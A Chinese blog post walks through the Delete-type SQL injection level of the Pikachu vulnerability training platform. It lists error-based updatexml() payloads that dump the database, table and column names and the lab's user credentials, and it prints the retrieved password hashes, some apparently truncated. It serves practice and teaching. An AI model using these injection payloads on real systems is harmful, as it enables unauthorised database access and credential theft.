欢迎光临散文网 会员登陆 & 注册

Pikachu 漏洞练习平台Sql Injection Delete型注入通关指南pika~pika~

2023-03-11 12:31 作者:Yukito_online  | 我要投稿


删除数据的时候观察F12发送了一个GET请求的数据包,猜测id字段存在注入点

传一个单引号,发现报错,证实id字段存在注入点,我们用updataxml()方法,原理是updatexml()不认识~(ASCII码0x7e)

1+||+updatexml(1,concat(0x7e,database()),2)
1+||+updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='pikachu' limit 3,1)),2)
1+||+updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 4,1)),2)
1+||+updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 12,1)),2)
1+||+updatexml(1,concat(0x7e,(select username from users limit 1,1)),2)
1+||+updatexml(1,concat(0x7e,(select username from users limit 0,1)),2)
1+||+updatexml(1,concat(0x7e,(select username from users limit 2,1)),2)
1+||+updatexml(1,concat(0x7e,(select password from users limit 0,1)),2)
1+||+updatexml(1,concat(0x7e,(select password from users limit 1,1)),2)
1+||+updatexml(1,concat(0x7e,(select password from users limit 2,1)),2)

admin:e10adc3949ba59abbe56e057f20f883

pikachu:670b14728ad9902aecba32e22fa4f6b

test:e99a18c428cb38d5f260853678922e0 


Pikachu 漏洞练习平台Sql Injection Delete型注入通关指南pika~pika~的评论 (共 条)

分享到微博请遵守国家法律